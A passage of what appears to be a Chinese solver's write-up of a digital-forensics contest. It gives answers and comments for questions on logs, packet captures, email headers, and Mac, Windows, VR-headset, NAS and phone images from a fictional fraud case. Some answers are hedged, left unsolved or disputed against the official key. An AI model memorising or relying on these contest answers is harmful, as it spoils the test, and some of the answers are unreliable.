192.168.1.1 - - [12/Oct/2023:14:55:36 +0000] “GET /index.html HTTP/1.1” 200 1024

192.168.1.15 - -[12/Oct/2023:14:56:10 +0000] “POST /login.php HTTP/1.1” 200 512

192.168.1.10 - - [12/Oct/2023:14:57:01 +0000] “GET /admin/dashboarD:php HTTP/1.1” 403 256

192.168.1.20 - - [12/Oct/2023:14:58:25 +0000] “GET /index.html HTTP/1.1” 200 1024

哪个IP地址试图访问受限页面？（2分）

A. 192.168.1.15

B. 192.168.1.10

C. 192.168.1.20

D. 192.168.1.1

80.[单选题]參考以下网络数据包捕获的十六进制部分：

0000 00 1a a0 b0 c0 d0 00 1b c1 d1 e1 f1 08 00 45 00

0010 00 3c 1c 46 40 00 40 06 a6 ec c0 a8 01 0a c0 a8

0020 01 14 00 50 d1 5c 1a 2b 3c 4d 5e 6f 70 80 90 a0 0030 b0 c0 d0 e0 f0 00 00 00 00 50 02 20 00 b5 e2 00

数据包的源IP地址是什么？（2分）

A. 192.168.1.10

B. 192.168.1.20

C. 10.0.0.1

D. 172.16.0.1

81.[单选题]题目见描述（2分）

參考以下Wireshark捕获摘要:

No. Time Source Destination Protocol Length Info

1 0.000000 192.168.1.10 192.168.1.255 ARP 42 Who has 192.168.1.255? Tell 192.168.1.10

2 0.005000 192.168.1.20 192.168.1.10 ICMP 98 Echo (ping) request

3 0.010000 192.168.1.10 192.168.1.20 ICMP 98 Echo (ping) reply

4 0.020000 192.168.1.30 192.168.1.10 TCP 66 12345 > 80 [SYN] Seq=0 Win=64240 MSS=1460

5 0.025000 192.168.1.10 192.168.1.30 TCP 66 80 > 12345 [SYN, ACK] Seq=0 Ack=1 Win=64240 MSS=1460

6 0.030000 192.168.1.30 192.168.1.10 TCP 54 12345 > 80 [ACK] Seq=1 Ack=1 Win=64240

描述此捕获中发生的事件顺序｡

A. Ping请求后发送ARP请求

B. ARP请求、Ping交换和TCP握手

C. TCP握手后发送ARP请求

D. 仅存在ICMP流量

82. [单选题]题目见描述（2分）

參考服务器上netstat命令的以下输出：

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

tcp 0 0 192.168.1.10:22 203.0.113.20:54321 ESTABLISHED

tcp 0 0 192.168.1.10:80 198.51.100.5:12345 ESTABLISHED

tcp 0 0 192.168.1.10:443 203.0.113.25:23456 ESTABLISHED

哪些服务当前正在服务器上运行并监听？

A. 在80端口上的SSH和54321端口上的HTTP

B. 仅在22端口上的SSH

C. 在22端口上的SSH，12345端口上的HTTP，以及443端口上的HTTPS

D. 仅在23456端口上的HTTPS

83.[单选题]参考以下电子邮件头信息：

From:“John Doe” john.doe@example.com To:“Jane Smith” jane.smith@company.com Date:Thu, 12 Oct 2023 19:00:00 +0000 Subject:Important Update Received:from unknown (HELO mail.example.com) (192.0.2.10) by mail.company.com with SMTP; Thu, 12 Oct 2023 19:00:05 +0000 X-Mailer:PHPMailer 5.2

识别可能表明电子邮件被伪造的任何异常。（2分）

A. 使用了PHPMailer 5.2

B. 电子邮件头部显示未知发件人

C. 电子邮件在19:00:00发送，但在19:00:05接收

D. 主题是"重要更新"

84.[单选题]在网络取证中，您会检查TCP/IP数据包中的哪个字段来验证数据在传输过程中是否受到了破坏？（1分）

A. TCP序列号

B. 数据包大小

C. 校验和（Checksum）

D. 目标端口

常识题，不用问ai

85.[单选题]以下哪个特征最能表明僵尸网络中的指挥与控制（C2）通信？（1分）

A. 高频率的DNS查询到热门域名

B. 数据包传至255.255.255.255

C. 与远程服务器进行定期周期性通信

D. 使用FTP协议进行过多的文件传输请求

常识题目，不确定可以问问ai

86.[单选题]在IP封包分析中，哪一個數值最能夠協助推斷封包經過的距離？（1分）

A. 由于路由无响应导致的数据包丢失增加

B. IP封包中的TTL值

C. ICMP回显回复中不匹配的序列号

D. 路由器级别检查IP选项字段的异常

常识题目，我记得ping可以显示这个内容

87.[单选题]通过从跳转站获得的信息（Ben_Jumpstation.zip），你认为Alice的笔记本电脑可能包含与犯罪相关的更多信息。你建议调查员进一步扣押Alice的笔记本电脑进行分析。参考Alice_Macbook.e01，计算机名称是？（1分）

A. Alice’s MacBook Pro

B. Alice’s Laptop

C. Alice’s Mac

D. Alice’s MacBook

88.[填空题]参考Alice_Macbook.e01，Alice的计算机运行的macOS Monterey版本是？（答案格式：123.456.789）（1分）

12.7.6

挺奇怪的，这里跑出来的版本好像不对

搜同名文件，发现这个版本号才对

火眼跑出来的是恢复系统的版本号，而得看这个preboot文件夹下的是

89.[填空题]参考Alice_Macbook.e01，Alice的计算机的EN0 MAC地址是？（答案格式：xx:xx:xx:xx:xx:xx，小写英文字母和阿拉伯数字混合组成）（1分）

f4-5c-89-a1-c0-07

90.[填空题]参考Alice_Macbook.e01，Alice在2024年8月19日收到了一个包含15个人个人资料的Excel文件，她是从哪一个平台下载这个文件的？（答案格式：请用小写英文作答（无须留空白位），例如：facebook）（2分）

whatsapp

91.[填空题]承上题，参考Alice_Macbook.e01，Alice是何时在她的Mac上安装了上述应用程序？（答案格式：YYYY-MM-DD HH:MM）（2分）

2024-08-19 10:03

可以看到，安装包是9:57生成的，但是10:03开始出现了whatapp的相关数据，说明这个时候才安装好。

92.[填空题]参考Alice_Macbook.e01，Alice在2024年8月19日在计算机上截取了两张屏幕截图，都是关于安置客服人员的电骗中心位置，她是使用哪个浏览器来搜索这个位置？（1分）

safiri

可以看到下面打开的浏览器只有safari

93.[填空题]参考Alice_Macbook.e01，她的计算机的Team Viewer ClientID是多少？（答案格式：只需使用阿拉伯数字回答）（1分）

358639376

94.[单选题]参考Alice_Macbook.e01，Alice曾经登录Teamviewer并获取一个包含个人数据的excel文件，Alice是透过以下哪一个方法登录Teamviewer以获取该文件？（2分）

A. Teamviewer Desktop Application

B. web.teamviewer.com

C. Anydesk

D. 以上皆不是

第一次仿真mac，仿真完就能看了

95.[单选题]承上题，上述包含个人数据文件的文件名是？（2分）

A. newfile.xlsx

B. personal_data.xlsx

C. Personal_details_2.xlsx

D. Kingsoft_Et_Stocka.xlsx

接上题，其实可以和74题联系起来

96.[填空题]承上题，参考Alice_Macbook.e01，Alice是何时通过Teamviewer获取上述包含个人资料的文件的？（答案格式：YYYY-MM-DD HH:MM）（2分）

2024-08-23 17:31

看创建时间就行了

97.[填空题]参考Alice_Macbook.e01，Alice透过Teamviewer连接另一台计算机以获取文件的Teamviewer ID是多少？（答案格式：只需使用阿拉伯数字回答）（2分）

687062512

其实就是跳转站的TeamViewer ID

98.[填空题]同样，跳转站（Ben_Jumpstation.zip）也指向一些可能从John的桌面计算机获取的关键信息。参考John_Desktop.e01，系统最后关机时间是？（答案格式：YYYY-MM-DD HH:MM:SS）（2分）

2024-08-20 17:40:05

99.[单选题]参考John_Desktop.E01，系统连接USB SanDisk 3.2Gen 1，其序列号是？（2分）

A.01010de54f417fee2292cb6b6ed760608009cace6e76a

B.D9644B9861A106C9DB4FD4599863C856C6789384B

C.4f7b6f8fc20f74329994f7d3fac6920a8d0ecd33fabad423

D.8fe24bf440f2def1c5182e1a27a4c183f5d6024b758c803

100.[判断题]参考John_Desktop.e01，于2024年8月28日13时57分21，John曾连接过Meta Quest 3吗？（2分）

对

101.[填空题]参考John_Desktop.E01，John在何时打开了Joshe Investment.JPG文件？（答案格式:YYYY-MM-DD HH:MM:SS）（2分）

2024-08-01 16:13:08

递归没搜到这个文件，其实应该得想到肯定会是移动设备里面的文件

看了一下和官方的答案对不上，但是这题就感觉是官方答案的问题了，没有官方那个时间点的任何记录

102.[填空题]参考John_Desktop.e01，用户 "DESKTOP-HDKJIJJ”的安全标识符（SID）是？（答案格式:大写英文字母，阿拉伯数字和符号一混合组成）（2分）

S-1-5-21-938709476-2694722248-4044499888-1001

*103.[单选题]参考John_Desktop.e01，有多少个用户帐户是停用（disabled）？（2分）

A. 1

B. 2

C. 3

D. 5

比较赞同他们说的答案是四个，查看了计算机管理内用户的属性，通过用户的disable是否勾上来判断

104.[填空题]参考John_Desktop.E01，该计算机被动态主机配置协议（DHCP）所分配的IP位址是？（答案格式:123.123.123.123）（2分）

172.20.10.2

105.[单选题]参考John_Desktop.E01， DF_2024_08_29_10_01_27_906.mp4是什么类型的视频？（2分）

A. 自我介绍

B. 产品锁售

C. 深伪视频

D. 足球比赛

就是伪造这人的视频向其他人诈骗，当时考场听到周围一圈人在听英文版的视频，队友一开始打开错了，直接听的中文的。

106.[单选题]在搜査John住所期间，调査员检取了一副虚疑景 （VR） 眼鏡进行了取证检査。参考Quest_3_2G0YC5ZFB307D7.zip文件，虚疑景 （VR） 眼鏡有多少个使用者？（3分）

A. 1

B. 2

C. 3

D. 4

时隔半年，火眼还是分析不了VR，只能翻翻文件了

107.[单选题]参考Quest_3_2G0VC5ZFB307D7.zip，VR眼鏡默认安装了什么即时通讯软件（lnstant Messaging App）？（3分）

A. WeChat

B. LINE

C. WhatsApp

D. Telegram

108.[填空题]参考Quest_3_2G0YC5ZFB307D7.zip，虛疑實景（VR）眼鏡应用程序"Gun Raiders"的版本是？（答案格式：1.2.3）（2分）

10.6.5

109.[判断题]参考Quest_3_2G0YC5ZFB307D7.zip，VR眼镜应用程序"Gun Raiders"，可以启动设备发现或操纵蓝牙（2分）

对

110.[填空题]参考Quest_3_2G0YC5ZFB307D7.zip，在DCIM文件夹内，VR眼镜有多少视频的文件修改时间是2024年8月13日？（答案格式：请以阿拉伯数字作答）（2分）

3

111.[填空题]参考Quest_3_2G0YC5ZFB307D7.zip，在提供的网络信息中，虛疑實景（VR）眼鏡’wlan0’ 网络接口的IPv4地址是？（答案格式：123.123.123.123）（2分）

192.168.1.142

112.[单选题]除了以上John的所有设备之外，调查员还发现了一台NAS存储设备，并转交你进行分析。参考John_NAS_1.E01和John_NAS_2.E01，它是哪一种独立磁盘冗余阵列（RAID）？（2分）

A. RAID 0

B. RAID 1

C. RAID 5

D. 以上皆不是

先用ftk挂载nas盘，然后自动识别了raid阵列

113.[判断题]参考John_NAS_1.E01和John_NAS_2.E01，该NAS的容量有512GB（2分）

错

114.[单选题]参考John_NAS_1.E01 和John_NAS_2.E01，该NAS的可用空间有多少？（3分）

A. 512GB

B. 426GB

C. 417GB

D. 9.4GB

容量是426GB，那么可用空间肯定比426GB少一点

*115.[判断题]参考John_NAS_1.E01和John_NAS_2.E01，该NAS的文件系统格式是EXT3（2分）

看了一下，用iSCSI这个服务我好像挂载不了重组的raid盘。取证大师现在也没有授权了，直接放弃这道题了

116.[单选题]参考John_NAS_1.E01和John_NAS_2.E01，该NAS的用户人数有多少个？（2分）

A. 1

B. 2

C. 3

D. 4

只有两个文件夹下面有东西

117.[单选题]参考John_NAS_1.E01和John_NAS_2.E01，该NAS内有多少张圖片标示’This is a Child PORN PHOTO’？（2分）

A. 1

B. 2

C. 3

D. 4

只有这张图片符合要求，其他均是字符不对，或者大小写问题

118.[填空题]参考John_NAS_1.E01 和John_NAS_2.E01，视频ING_VID_8081695_10s.mp4在什么时候放进NAS内？（答案格式:YYYY-MM-DD HH:MM:SS） （3分）

2024-08-08 10:59:40

119.[填空题]参考John_NAS 1.E01和John_NAS_2.E01，dcdb711a52a94fe9b6eb742a6919410D.mp4是在哪个网站下载的？（答案格式：www.abcd.com）（3分）

www.vjshi.com

感觉官方给的答案太扯了，aliyun，不知道怎么看的

120.[填空题]参考John_Desktop.E01，John访问NAS的网络地址是？（答案格式：123.123.123.123）（2分）

169.254.43.127

121.[单选题]参考John_Desktop.E01，该NAS的网络驱动器盘符（Network Drive Letter）是？（2分）

A. A

B. C

C. Z

D. F

*122.[判断题]参考John_Desktop.E01，John_NAS_1.E01和John_NAS_2.E01，当中的v文件夹内的视频及照片数量是相同的？（2分）

错

看着数量都是50，不知道为什么答案是错

123.[填空题]参考John_NAS_1.E01和John_NAS_2.E01，该NAS的a文件夹中，"1.jpeg"是由哪个网站生成？（答案格式：abcd.com）（2分）

poe.com

*124.[填空题]参考John_NAS_1.E01和John_NAS_2.E01，该NAS的c文件夹中，有一个被删除了的照片，它的名称是什么？（答案格式：小写英文字母，阿拉伯数字和符号’-'混合组成，例如：123-abcf-456.jpg）（2分）

这种题目，理论上挂载起来，用火眼跑一遍就能找到了。但是挂载不起来

125.[填空题]根据你以上的发现，你直觉认为有无辜的人被雇为所谓的客服人员，他们的安全仍然存在疑虑。你决定再次查看Alice的手机镜像以确认你的推测。参考Alice_Mobile.bin，于2024年8月16日，Alice使用外送程序"Foodpanda"于哪间店铺点餐？（答案格式：大写英文字母，例如：GOODCAFE(CENTRAL)）（3分）

MILKCAFE(FAIRVIEWPARK)

时间可能有问题，只找到30号的记录

126.[单选题]参考Alice_Mobile.bin，于2024年8月30日，Alice使用外送程序"Foodpanda"点餐用了哪种方式付款？（2分）

A. 微信支付

B. PayMe

C. 支付宝

D. 现金

E. 信用卡

127.[填空题]参考Alice_Mobile.bin，Alice最后使用外卖程序"Foodpanda"的日期？（答案格式:YYYY-MM-DD）（2分）

2024-09-02

128.[单选题]参考Alice_Mobile.bin，Alice要求安排"客务人员"逃到哪里？（2分）

A. 埃及

B. 阿根廷

C. 巴西

D. 哥伦比亚

E. 南非

129.[单选题]参考Alice_Mobile.bin，Alice曾经向“客服人员”发送一张照片，指出上船地点的位置，拍摄这张照片的GPS经纬值是什么？（2分）

A. 22.474444444444,114.039722222222

B. 22.473611111111,114.042777777778

C. 22.475277777778,114.038888888889

D. 22.475000000007,114.035833333333

E. 22.476388888889,114.036388888889

是相册里面这张图片，有经纬度

130.[单选题]参考Alice_Mobile.bin，根据多媒体文件的分析，于2024年8月16日，Alice曾到哪里进行拍摄？凭着你及团队的机智及专业知识，成功锁定犯罪团伙禁锢人质的位置。行动单位根据你的讯息,迅速展开拯救行动，赶在被押离港前成功救出人质。（2分）

A. 旺角

B. 沙田

C. 黄大仙

D. 大生围

E. 天水围

看见很多人都是根据图片经纬度来确定最终的位置的，但是比赛离线环境如果没有离线地图，肯定也是做不到的，所以找到了16号的聊天记录和视频，虽然不是很清楚，但是可以看清第一个字是大，然后对比答案来看，这图片里面的三个字就是大生围了。